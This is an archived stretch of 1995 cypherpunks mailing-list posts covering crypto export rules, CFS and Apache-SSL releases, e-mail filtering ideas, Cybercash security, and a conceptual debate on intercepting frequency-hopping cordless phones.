5:35 PM. Actually, he did a pretty good job of towing the er, party line. Lots of good opportunities for analogical heavy lifting in arguments with statists. "Suppose you had a very strong door which protected your whole house and made it inviolate. Suppose then the government then wanted to have copy of your door keys on the off-chance you turn into a crack dealer someday...", etc. Except for the fact that he wants Uncle to protect his patents, that is... ;-). This was done on December 8 at the Commonwealth Club in SFO. Were there c'punks there? The questions sounded like it... He also said something about some kind of magic badge with biometric/PK software which would allow you to work anywhere there was a network connection. Reminiscent of our discussions about Xerox PARC's ubiquitous computing stuff, Gerry O'Neil's 2081, etc. I feel a rant coming on about this "information toaster" stuff, Metcalfe's fight with Alsop in Infoworld, etc. Guess I'll start it tomorrow. Take cover everybody... Merry Christmas! Cheers, Bob -------------------------------------------------- The e$ lists are brought to you by: Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html Where people, networks and money come together: Consult Hyperion http://www.hyperion.co.uk info at hyperion.co.uk See your name here! Be a charter sponsor for e$pam, e$, and Ne$ws! e-mail rah at shipwright.com for details... ------------------------------------------------- From rah at shipwright.com Mon Dec 25 16:44:08 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Dec 1995 08:44:08 +0800 Subject: (cpx) Re: Bidzos on C-Span 2 Message-ID: Oops. You can shoot me now... Sorry, folks! e$pam first and let god sort 'em out. Fixing that little problem this week, as a matter of fact. Cheers, Bob ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From dxm at alpha.c2.org Mon Dec 25 16:54:01 1995 From: dxm at alpha.c2.org (dxm at alpha.c2.org) Date: Tue, 26 Dec 1995 08:54:01 +0800 Subject: New Release of CFS Message-ID: <199512260014.QAA08982@infinity.c2.org> Matt Blaze writes: > [Perhaps this isn't the best time for me to post this here; apologies > in advance if this sparks another flame fest. -matt] > > Source code for the latest version (release 1.3.2) of CFS, the Cryptographic > File System, is now available upon request for research and experimental > use in the US and Canada. Dear Mr. Blaze: As you seem to have noticed, a few subscribers to cypherpunks are more interested in exploring their own personal psychopathologies than in the creation and spread of strong cryptography. Please do not feel that you need to apologize for their actions, and especially please do not restrict your actions and/or posts because of them. To correct merely one of the many mis-statements made by these people desperate to draw attention to themselves, the Linux community is NOT interested in 'out-of-the-box'. If we were interested in 'out-of-the- box', we would be running OSs that COME in a box. What we ARE interested in is source (or, if source isn't available, at least 128 bit keys). If you provide source, we'll port it. It's that simple. While support is nice, and appreciated, it is NOT NEEDED. We can take care of ourselves. So, on behalf of the Linux community and those of us running CFS, thank you very much for your contribution. And please don't let a couple of idiots like these lower your opinion of the over 1 million Linux users who appreciate your efforts and support. -- Deus Ex Machina dxm at alpha.c2.org From root at deimos.toad.com Mon Dec 25 17:15:39 1995 From: root at deimos.toad.com (Tom Zerucha) Date: Tue, 26 Dec 1995 09:15:39 +0800 Subject: ex encrypted script In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net> Message-ID: On Wed, 20 Dec 1995, Jason Rentz wrote: > Forgive me if this is a stupid question. > > I'm using AT&T unix Version 5 release 3.2.2 ( UNIX System V/386 Release 3.2) > > I have several simple scripts that are simple yet handle important realtime > call proccessing tasks and remote control operations. These programs are my > programs but are running on a system that is dialed into by the vendor once > in a while. > > Is there a way to encrypt a script yet still allow it to be runnable? I > know that the simple answer is to write it in C and compile it but I don't > have the means of doing that at the moment. (i.e. there is not compiler on > the system) You can try something similar to what gzexe does, but... > I thought of a few simple protections but they all involve decrypting before > running. ...unless the CPU has built in decryption this will be a necessity. A compromise might be to put this into the kernel zerucha at shell.portal.com finger zerucha at jobe.portal.com for PGP key From fc at all.net Mon Dec 25 17:37:22 1995 From: fc at all.net (Fred Cohen) Date: Tue, 26 Dec 1995 09:37:22 +0800 Subject: anonther anonymous poster afraid to even tell us who they are In-Reply-To: <199512252215.XAA07650@utopia.hacktic.nl> Message-ID: <9512260044.AA14158@all.net> Another anonymous poster tells the cypherpunks to abandon liberty by abusing it. When will the cypherpunks learn stand up to these people. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From dlv at bwalk.dm.com Mon Dec 25 18:21:59 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Tue, 26 Dec 1995 10:21:59 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: <199512251953.OAA01614@homeport.org> Message-ID: Adam Shostack writes: > It would seem that only accepting signed mail, and caching the > hash of the signed part would work pretty well, and also not require Keeping a hash of the signed part sounds like an excellent defense from the attack of recycled messages. "Your mail blah blah is being returned to you because it appears to be similar to the e-mail you send on dd/mm/yy". Cool. > anything (other than a signature) from the remote end. The cost of a > spam is the time to generate a new key pair. (You probably need some > way to add new keys, for people to be able to say 'I'd like to talk to > you.') When thinking of a protocol, it's useful to consider what do we do in "real life" to reach an important person: Either ask a common acquiantance to introduce you, or go through a secretary. Say, Alice wants to send e-mail to Bob who doesn't accept e-mail to strangers. Alce may learn that Bob accepts Carol's e-mail, and ask Carol to forward Alice's e-mail to Bob (with Carol's signature). An interesting idea would be for Bob (together with other people) to pay some David to screen their e-mail received from strangers (manually, or with the help of some programs) and to decide whether to pass them on to Bob or to discard it. E-mail from known senders goes straight to Bob, and e-mail from strangers goes to David the screener. Not unlike "real life". --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From adam at lighthouse.homeport.org Mon Dec 25 20:14:29 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 26 Dec 1995 12:14:29 +0800 Subject: FH radios In-Reply-To: Message-ID: <199512260358.WAA02279@homeport.org> jim bell wrote: | Is there actually a restriction on the export of really-fast | frequency-hopping radios, even those (like cordless phones) which have no | clear military value? Yes. The ITARs restrict the export of any radio which hops faster than one frequency per second. (Or ten seconds if it hops between more than 8 bands.) See ITAR XIII.b.1.iii.C (ftp://ftp.cygnus.com/pub/export/itar.in.full) -- "It is seldom that liberty of any kind is lost all at once." -Hume From jamesd at echeque.com Mon Dec 25 21:26:20 1995 From: jamesd at echeque.com (James A. Donald) Date: Tue, 26 Dec 1995 13:26:20 +0800 Subject: Assault presses with cop killer computers. Message-ID: <199512260507.VAA09404@blob.best.net> While channel surfing around 6PM today on Christmas day, I saw President Clinton announce the grave international threat posed by terrorists, drug dealers and money launderers wielding computers (Only three horsemen -- he left out child pornographers.) He was immediately followed by an Expert In Television Expertise, who told us that computers were getting more and more powerful, and doing more and more things, and that Something Must Be Done. The Expert did not actually use the phrase "The first Amendment was never intended to protect modern assault presses using cop killer computers", but that was the message. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From nobody at flame.alias.net Tue Dec 26 01:09:50 1995 From: nobody at flame.alias.net (Anonymous) Date: Tue, 26 Dec 1995 17:09:50 +0800 Subject: HRB Systems Data Storage Encryptor Message-ID: <199512260845.JAA28578@utopia.hacktic.nl> Check out http://www.hrb.com/encryption/ssp.html, your exclusive source of the Ultron Crypto-Engine (tm) From futplex at pseudonym.com Tue Dec 26 01:18:59 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 26 Dec 1995 17:18:59 +0800 Subject: Encryption Discrimination from Sun In-Reply-To: <199512252216.OAA09495@netcom2.netcom.com> Message-ID: <199512260855.DAA16540@thor.cs.umass.edu> Mike Duvos writes (re: The Java Cup) > While reading the contest rules, I found the following one > particularly interesting... > > "No entries may include encryption as a feature > or part of an applet." [...] > Doubtless the reason Sun nixed encryption is because this is an > international contest, and they did not want to deal with legal > hassles involving international borders and different laws in > every country. OTOH, they don't have any ITAR-like rules about not installing crypto hooks. (It's pretty amusing that residents of Romania are eligible to enter, but not residents of Vermont. At least to me, since I don't live in Vermont. ;) > Nonetheless, they seem to have missed an excellent opportunity > to encourage the migration of privacy software into the new > realm they are creating. I'm not convinced that such a contest is capable of that anyway. As in most such contests, entries basically become the property of the sponsor. In this case, "By participating in the Contest, Contestant waives all claim to intellectual property rights in the entry, including patent rights and copyright, and waives all moral rights, except where prohibited." (Wow ! I didn't know I could waive my moral rights !) I'm not inclined to hand the Java privacy software on which I'm working over to Sun, even though I like Sun. If I were just working on a Tetris applet or something, I wouldn't mind.... -Futplex Cowboys 37, Cardinals 13; Merry Christmas, 49ers: We'll see you in Dallas ! From Kevin.L.Prigge-2 at cis.umn.edu Tue Dec 26 09:17:05 1995 From: Kevin.L.Prigge-2 at cis.umn.edu (Kevin L Prigge) Date: Wed, 27 Dec 1995 01:17:05 +0800 Subject: Assault presses with cop killer computers. In-Reply-To: <199512260507.VAA09404@blob.best.net> Message-ID: <30df89c1456a002@noc.cis.umn.edu> According to rumor, James A. Donald said: > > While channel surfing around 6PM today on Christmas day, I saw > President Clinton announce the grave international threat > posed by terrorists, drug dealers and money launderers wielding > computers (Only three horsemen -- he left out child pornographers.) Probably because child pornographers have been dealt with in the recent bill signed by Bill, which mandates 24-30 months for transmitting child porn, double if a computer is used. > > He was immediately followed by an Expert In Television Expertise, > who told us that computers were getting more and more powerful, and > doing more and more things, and that Something Must Be Done. I'll have to keep an eye on my machine, I think it may be subversive. Remember, computers don't break laws, people do... > The Expert did not actually use the phrase "The first Amendment was never > intended to protect modern assault presses using cop killer computers", > but that was the message. > I'll have to rename my machine black-rhino :) -- Kevin L. Prigge |"Have you ever gotten tired of hearing those UofM Central Computing | ridiculous AT&T commercials claiming credit email: klp at tc.umn.edu | for things that don't even exist yet? 010010011101011001100010| You will." -Emmanuel Goldstein From anon-remailer at utopia.hacktic.nl Wed Dec 27 03:40:38 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 27 Dec 95 03:40:38 PST Subject: New release (v.1.3.2) of CFS Unix encrypting file system available Message-ID: <199512271140.MAA04896@utopia.hacktic.nl> >Source code for the latest version (release 1.3.2) of CFS, the Cryptographic >File System, is now available upon request for research and experimental >use in the US and Canada. Does anyone know if this code has made it across the pond yet? If so please post the ftp location to sci.crypt or comp.os.linux.misc. I don't read this list. Thanx. From tallpaul at pipeline.com Tue Dec 26 13:30:18 1995 From: tallpaul at pipeline.com (tallpaul) Date: Wed, 27 Dec 1995 05:30:18 +0800 Subject: Assault presses with cop killer computers. Message-ID: <199512261249.HAA01723@pipe8.nyc.pipeline.com> On Dec 25, 1995 23:36:00, 'Kevin L Prigge ' wrote: >According to rumor, James A. Donald said: >> >> While channel surfing around 6PM today on Christmas day, I saw >> President Clinton announce the grave international threat >> posed by terrorists, drug dealers and money launderers wielding >> computers (Only three horsemen -- he left out child pornographers.) > >Probably because child pornographers have been dealt with in >the recent bill signed by Bill, which mandates 24-30 months >for transmitting child porn, double if a computer is used. > see Reuters, "Clinton acts to tougher penalties" 23 Dec 95 08:40 clari.news.crime.sex Message-ID: see AP, "Clinton signs porn bill," 23 Dec 95 09:40 clari.news.crime.sex Message-ID: What is most interesting is how far the four horsemen have rampaged and the destruction they have already done. The internet is not the *least* regulated as those pushing for "tougher penalties" claim. One can argue, using the new federal doubling of prison terms when computers are used, that it is the *most* regulated. One can also see how far the combination of sexual hysteria and fear of new technology has fed into and been used by politicians from throughout the political spectrum. It also shows how much of the government threat to privacy is a social, not a technological, issue. While people argue about heat-death-of-the-universe encryption algos, a different form of hot air is producing the heat death of civil liberties. While cyber-libertarians talk about how strong crypto algos are needed to protect property and how "the statists in Washington" are trying to take away their crypto, right-wing pro-capitalist politicians have already taken away civil liberties. While crypto-radicals talk about how strong crypto algos are needed to lead the revolution and how "the nazis in Washington" are trying to take away their crypto, sexual hysterics calling themselves "radical feminists" have already helped take away many civil liberties. I support strong crypto. I support powerful and secure algos. I see it as a wonderful development of technology to protect individual privacy. But privacy is only one right of the citizen; it is only one of the many civil liberties under attack. I am also disturbed by the number of discussions on the list that may be on topic but avoid *these* social issues, E.G. Army vs. Navy Captain? how cheap is AT&T? Bizdos: confused executive vs. conspiratorial swine? Are CFS programmers being treated nicely? Fred Cohen: nice guy victim or swine? Why Alice should use PGP. Ever heard of bit fiddlin' while Rome burns? --tallpaul From hal9001 at panix.com Tue Dec 26 15:20:18 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Wed, 27 Dec 1995 07:20:18 +0800 Subject: Only accepting e-mail from known parties Message-ID: At 14:33 12/25/95, tallpaul wrote: >Thoughts? (I see one problem with this but it should be able to be worked >out once the basic method is agreed to). I assume that the "Problem" is that by only giving each corespondent ONE E-Stamp, you are single streaming your connections with them (ie: Are talking Half-Duplex). Not only are they restricted to one message "in-flight" but they can not start another message until they have done a capture run to acquire your ACK and get the new key. From combee at techwood.org Wed Dec 27 08:11:43 1995 From: combee at techwood.org (Ben Combee) Date: Wed, 27 Dec 95 08:11:43 PST Subject: Austin CPunk Video Update Message-ID: <199512271611.KAA16961@matrix.eden.com> First, a lot of thanks to all of you who sent me ideas for the Cypherpunk video we are working on here in Austin. I'm sorry I haven't individually acknowledged all of you, but it was been a busy couple of months. Here is our status: We have agreed on the meeting infrastructure, with a video working group meeting twice a month of planning/strategy meetings and at other times for filming, editing, and so on. We have decided to do a 30 minute video with segments dealing with crypto history, basic theory, popular applications, and possible futures. We may go one to produce further videos which look at these topics in more detail. We have a outline of the segments of the video. The outline was originally conceived for a 60 minute program, so some items might have to be cut. This outline should be available online sometime soon off my web page at http://www.yak.net/combee/crypto/ (URL not yet active). This program will initially air on Austin's public access stations, but we have nebulous plans to distribute it once that requirement is met. Questions? Just write to me or to all the Austin CPunks at austin-cpunks at einstein.ssz.com. -- eebmoC .L nimajneB | Benjamin L. Combee (REVERSE) gro.doowhcet at eebmoc | combee at techwood.org (ENGINEERING) \eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/ (RESERVE) From bugs at ritz.mordor.com Wed Dec 27 08:12:06 1995 From: bugs at ritz.mordor.com (Mark Hittinger) Date: Wed, 27 Dec 95 08:12:06 PST Subject: a new idea: stocks == currency Message-ID: <199512271611.LAA20760@ritz.mordor.com> > I've not seen promoted by any single author yet (although I have seen > some prominent cpunks argue the opposite). There was a book written some time ago called "SuperMoney" that basically argues this point (that stocks were not only money, they were *better* than money). One example would be a deposit at a bank. How can you tell if there is a potential solvency problem at the bank? One quick and easy check is to look at the value of the stock of the bank! You see this behavior in currencies when you are exchanging a stronger one for a weaker one or vice versa :-) PS: I read Prechter's "turn of the tidal wave" book over the holidays, and although it is mostly dry, it is an interesting read. Regards, Mark Hittinger Netcom/Dallas bugs at freebsd.netcom.com bugs at ritz.mordor.com From jamesd at echeque.com Tue Dec 26 19:09:23 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 27 Dec 1995 11:09:23 +0800 Subject: HRB Systems Data Storage Encryptor Message-ID: <199512261539.HAA04685@blob.best.net> At 09:45 AM 12/26/95 +0100, Anonymous wrote: >Check out http://www.hrb.com/encryption/ssp.html, your >exclusive source of the Ultron Crypto-Engine (tm) The web page proudly announces: "is the only NSA-approved Type I data encryptor available today." There are probably some people ignorant enough to regard that as a recommendation. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From "Jason D. Livingood/WSC" at hks.net Wed Dec 27 13:54:19 1995 From: "Jason D. Livingood/WSC" at hks.net ("Jason D. Livingood/WSC" at hks.net) Date: Wed, 27 Dec 95 13:54:19 PST Subject: Employer Probing Precedents? Message-ID: <199512272151.QAA05241@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- To Whom It May Concern: I was curious as to where I might find some electronic freedom legal precedents. If, for example, an employer was planning to probe file systems on PCs in the off-hours and employees began encrypting their hard drives, what legal precedents would support the employees or would support the employer in blocking the encryption? Thanks for any info you can give me!! Jason Livingood jlivingood at hammer.net - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMOG/6ioZzwIn1bdtAQHQ2QF/cOq8vE9o+V/yGuk5KLbYv5E6xWJjV2cB pSHFhr4O0HtiTgOtTxMhylVmXFZpuosm =fIWG -----END PGP SIGNATURE----- From jimbell at pacifier.com Tue Dec 26 22:05:55 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 27 Dec 1995 14:05:55 +0800 Subject: FH radios Message-ID: At 05:06 PM 12/25/95 -0500, you wrote: > There is certainly little additional cost to building a >trully secure digital cordless phone given the dense ASIC technology >that is standard in this kind of product - but someone has to >persuade the manufacturers that there is a real need and find a way >to allow them to export the product. > > Dave Emery N1PRE Is there actually a restriction on the export of really-fast frequency-hopping radios, even those (like cordless phones) which have no clear military value? From Kevin.L.Prigge-2 at cis.umn.edu Tue Dec 26 22:10:40 1995 From: Kevin.L.Prigge-2 at cis.umn.edu (Kevin L Prigge) Date: Wed, 27 Dec 1995 14:10:40 +0800 Subject: [NOISE] Re: anonther anonymous poster In-Reply-To: <9512260044.AA14158@all.net> Message-ID: <30df67d24001002@noc.cis.umn.edu> According to rumor, Fred Cohen said: > > > Another anonymous poster tells the cypherpunks to abandon liberty by > abusing it. When will the cypherpunks learn stand up to these people. > This is really noise, but I just had a Woody flashback... All that he'd have to do is change the second sentance to "When will the cypherpunks learn to evaluate data." Anyhow, Merry Christmas :) -- Kevin L. Prigge |"Have you ever gotten tired of hearing those UofM Central Computing | ridiculous AT&T commercials claiming credit email: klp at tc.umn.edu | for things that don't even exist yet? 010010011101011001100010| You will." -Emmanuel Goldstein From jimbell at pacifier.com Tue Dec 26 22:11:05 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 27 Dec 1995 14:11:05 +0800 Subject: [Rant] Flame threads and factual accuracy Message-ID: At 07:30 AM 12/25/95 -0500, you (Fred Cohen) wrote: >With rights come responsibilities. If you want the right of free speech, you >have to use it responsibly - otherwise, you will lose the right - and quite >possible lose it for me as well. This commentary is pure bullshit. If it were possible to quantify it throughout history, I strongly suspect that the vast majority of instances where "free speech" was LOST (or was never had in the first place) occurred NOT because of some objectively agreed-upon ABUSE (irresponsible use) of that free speech, but in fact merely because those in power WANTED there to be no free speech. In short, "losing the right" had NOTHING to to with abuse. (Though admittedly, that might be a common excuse given...in lieu of the truth!) Fred, you richly deserve your bad reputation. From kdf at gigo.com Tue Dec 26 22:20:09 1995 From: kdf at gigo.com (John Erland) Date: Wed, 27 Dec 1995 14:20:09 +0800 Subject: Mix Ported to DOS Yet? Message-ID: [Please respond netmail, as I have but periodic contact w/list.] Subject says it all: Has anyone ported Mixmaster to DOS yet? It has been impending for about a year, it seems, but no one had actually done it last time I asked. Thanks for any new info... JE -- : Fidonet: John Erland 1:203/8055.12 .. speaking for only myself. : Internet: kdf at gigo.com From andr0id at midwest.net Wed Dec 27 00:28:33 1995 From: andr0id at midwest.net (Jason Rentz) Date: Wed, 27 Dec 1995 16:28:33 +0800 Subject: FH radios Message-ID: <199512262025.OAA09759@cdale1.midwest.net> Dave Emery writes: > There is also a newer technology called direct digital synthesis >or DDS that works by accumulating phase (adding to the previous value) We use DDS in some of our Microwave equipment between sites. > > There is certainly little additional cost to building a >trully secure digital cordless phone given the dense ASIC technology >that is standard in this kind of product - but someone has to >persuade the manufacturers that there is a real need and find a way >to allow them to export the product. > I agree; but, if the information you are passing is truly that important just use a landline phone. Eliminate the possable "leak". I'm not claiming that a landline phone is secure, but your cordless is connected to it, so no matter how good your security is on the phone its no longer secure once it leaves the base station and enters the landline. Further encryption can be implemented but this requires equipment on both ends. Really aren't we trying to create the most secure methods of information exchange with the least amount of cost? I'm budget restricted so PGP and the internet are more secure and cheaper for me than most other means of comunication, so far. :) Dr0id (andr0id at midwest.net callsign: N9XLM) ( Computer Consulting & Management ) (P.O. Box 421 Cambria, IL 62915-0421) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1 dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63 NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA= =SgPT -----END PGP PUBLIC KEY BLOCK----- From aleph1 at dfw.dfw.net Wed Dec 27 16:49:25 1995 From: aleph1 at dfw.dfw.net (Aleph One) Date: Wed, 27 Dec 95 16:49:25 PST Subject: Reputation capital: FIBS case study In-Reply-To: <2sY4wMz2BcRC083yn@mail.msen.com> Message-ID: On Wed, 27 Dec 1995, Lou Poppler wrote: > > I'm not really asking for suggestions here or anything. It's likely that > most of them have already been debated to death on r.g.b. I just wanted > to show you a case of reputation markets in action. If the server can keep track of drop games and the restart it should not be diffucult to keep a record for each player of how many games he has dropped and not restarted. A high number would mean a cheater or someone with a very bad phone line. In either case you dont want to play with them. For the second problem there is no easy solution. One thing to make it more anoying for the cheater is to keep a history of matches played by each players. A player that has played 50 matches with anotherone an won all is either cheating or not looking for a challange. Of curse the cheater just has to create a new nym each time to play agains in this case. Bottom line is that on the net a nym can be multiple persons and a person can have multiple nyms. > :::::::::::::::::::::::::::::::::::::: Thank you VERY much! You'll be > :: Lou Poppler :: getting a Handsome Simulfax Copy > :: http://www.msen.com/~lwp/ :: of your OWN words in the mail > :::::::::::::::::::::::::::::::::::::: soon (and My Reply). > Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From tadc at thetics.europa.com Wed Dec 27 16:52:05 1995 From: tadc at thetics.europa.com (T.R. Cox) Date: Wed, 27 Dec 95 16:52:05 PST Subject: BoS: Re: Misconfigured Web Servers In-Reply-To: <9511278200.AA820083186@cc2.dttus.com> Message-ID: On Wed, 27 Dec 1995, David Klur wrote: > > Re: the "trick" below... an even more effective search is the > following... > Is it just me, or is everyone getting a dozen of these? ////////////////////////////////////////////////////////////////////////\ |Thaddeus Cox = tadc at europa.com <==- Finger for standard legal disclaimer| |\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ |Are you using Europa? You ought to be-- Dial 503.222.4244, login as new | \///////////////////////////////////////////////////////////////////////// From sameer at c2.org Wed Dec 27 02:02:36 1995 From: sameer at c2.org (sameer) Date: Wed, 27 Dec 1995 18:02:36 +0800 Subject: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE Message-ID: <199512262112.NAA00652@infinity.c2.org> For Immediate Release Contact: Sameer Parekh 510-601-9777 COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE Community ConneXion today announced Apache-SSL Commerce, a commercial version of the Apache webserver with support for Netscape Communication Corporation's Secure Sockets Layer, a standard for encrypted communications over the Internet. Community ConneXion's Apache-SSL package includes Apache v1.0.0, extensions to Apache which enable the SSL protocol, additional customizations to the webserver, and tools to aid in server and SSL maintainence. The server supports virtual hosts and an extensible API to allow for easy modifications to the behavior of the server. Apache is currently the fastest growing HTTP server, looking set to become the most used web server on the net in 1996. Sameer Parekh, President of Community ConneXion, commented on their release of the encrypting webserver, "We're very happy to make available an affordable SSL server to the Internet community. For security to work, it must be ubiquitous, which requires that encrypting servers be affordable and widely deployed." Apache-SSL is available for free to non-commercial users, and the commercial use package, Apache-SSL Commerce, is available for $495.00. Customers who own versions of other commercial encrypting webservers can upgrade to Apache-SSL Commerce for $295.00. In addition to the right to use the server in commercial applications, the commercial package includes support and free lifetime upgrades from Community ConneXion. Apache-SSL Commerce is not available outside the United States, but Apache-SSL is available for free, both commercially and non-commercially, outside the United States from Ben Laurie, of A. L. Digital, Ltd. The Apache-SSL Commerce webserver is the only commercial encrypting webserver with source available. Ian Goldberg, graduate student at U.C. Berkeley, well-known for his work on SSL security, commented on the importance of available source, "The public release of source, especially for security-critical sections of code, is vital for a product in which the public must put its trust. It's far better for me to be able to check the software that's used, say, for accessing my bank account via the Web, for security problems, than for me to be forced to trust whatever company put out the product. Companies will soon find that releasing more information about the internals of their products will lead not only to better products, but better reputations, as well." Portions developed by the Apache Group, taken with permission from the Apache Server http://www.apache.org/. This product includes software developed by Ben Laurie for use in the Apache-SSL HTTP server project. This product includes software developed by Eric Young (eay at mincom.oz.au). Information on Apache-SSL is available at http://www.c2.org/apachessl/. Questions and inquiries regarding the server should be sent to apachessl at c2.org. Community ConneXion, founded in June of 1994, is the leading provider of privacy on the Internet. They provide anonymous and pseudonymous internet access and web pages in addition to powerful web service, virtual hosts, and web design consultation. Information is available from their web pages at http://www.c2.org/. From dklur at dttus.com Wed Dec 27 04:59:19 1995 From: dklur at dttus.com (David Klur) Date: Wed, 27 Dec 1995 20:59:19 +0800 Subject: Cybercash security Message-ID: <9511268200.AA820017186@cc2.dttus.com> What are the major security risks of the Cybercash system? I can't really find any, other than someone cracking the consumer's Cybercash client s/w password and using the victim's account to order something, or someone cracking RSA!. The following features seem to mitigate other risks... - The merchant never sees the credit card number - The Cybercash server does not store any credit card numbers (only temporarily while it is waiting for an authorizatino for a specific card purchase) - The consumer's credit card number is stored on his hard disk encrypted w/DES - The consumer sends his credit card number across the Internet encrypted w/DES and signed w/ 768-bit RSA From stig at hackvan.com Wed Dec 27 05:15:33 1995 From: stig at hackvan.com (Stig) Date: Wed, 27 Dec 1995 21:15:33 +0800 Subject: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt] Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I forwarded a cypherpunks message to technomads, where it got a killer response, so I'll bounce it back to Cypherpunks... Stig - ------- start of forwarded message (RFC 934 encapsulation) ------- From: Vaughan Pratt To: technomads at UCSD.EDU Subject: Re: Fwd: Re: FH radios [Dave Emery] Sender: pratt at cs.stanford.edu Date: Tue, 26 Dec 1995 12:00:43 -0800 Message-Id: <199512262000.MAA23334 at Coraki.Stanford.EDU> In-reply-to: Your message of "Tue, 26 Dec 1995 07:07:00 PST." >>> Thus in a frequency-hopping radio you can push the retuning (read RF >>> phase-locked loop) technology to its limit and build transmitters and >>> receivers around them. These typically hop in the order of 100 times a >>> second. The adversary has to find the uncorrelated signal very quickly >>> indeed *and* have PLL technology at least as good as yours to recover >>> anything from it. Finding the signal generally means listening to all >>> frequencies at once, requiring huge amounts of hardware parallelism and/or >>> realtime computing power. Once you throw ten or so radios onto the same >>> band, it's no longer any use looking for the strongest signal, making that >>> approach useless. >> >> This is nowhere near the limit of the technology. 15 years ago, I was >> working on PLLs that would stabilize within a couple degrees of final >> phase within 3.5 microseconds. That permits you to do useful work at >> 100,000 hops per second. >> > There is also a newer technology called direct digital synthesis >or DDS that works by accumulating phase (adding to the previous value) >each tick of a high frequency clock in a register at a rate determined >by the contents of another register (the value here sets the frequency) >with the upper bits of the accumulated phase being used to address a >sine/cosine lookup table rom which in turn feeds digital output values >into a D/A converter. The output of the D/A converter is a sampled >approximation of a sine or cosine wave at a frequency set by the >increment register. The sample rate is set by the high frequency clock >rate. This is all wishful thinking. A 26-MHz wide channel such as 902-928MHz has a channel capacity of 2*26 Mbs or 6.5 megabytes/sec. So if someone can tell *that* you are transmitting somewhere within that channel then they simply record *everything* at that data rate in the entire channel, your transmission and everyone else's, for the necessary time. A $600 3.5Gb Sequel drive can record a ten-minute transmission; then the eavesdropper can use one Pentium or two dozen, budget permitting, to extract your message from that data. If all you are doing is frequency hopping or spread spectrum, reconstruction is a very undemanding algorithmic task, and one Pentium should be able to reconstruct your signal the same day, two dozen the same hour. >But to get back to the original point of this thread - while >such techniques are possible (as is full hard encryption), it is my >understanding that actual conusmer 900 mhz digital cordless phones >that use frequency hopping use a very limited set of frequencies >and a small set of fixed hopping patterns and don't hop very fast. Hopping speed is almost completely irrelevant to the computational complexity of this problem. >When the brand of cordless phones that most emphasizes security >from eavesdropping in its point of sale advertising display is the one that >uses open FM with simple speech inversion you know there is something >wrong, particularly when the company that makes it is a pioneer in >really secure digital speech over handheld radios (and a big governmeent >contractor). To put it mildly. You can never overestimate the cost of decryption. What looks expensive enough today to decrypt can plummet by orders of magnitude on alarmingly short notice. We used to think TCP was mildly secure until easily installed sniffers became freely available on the internet that would reconstruct a telnet connection and 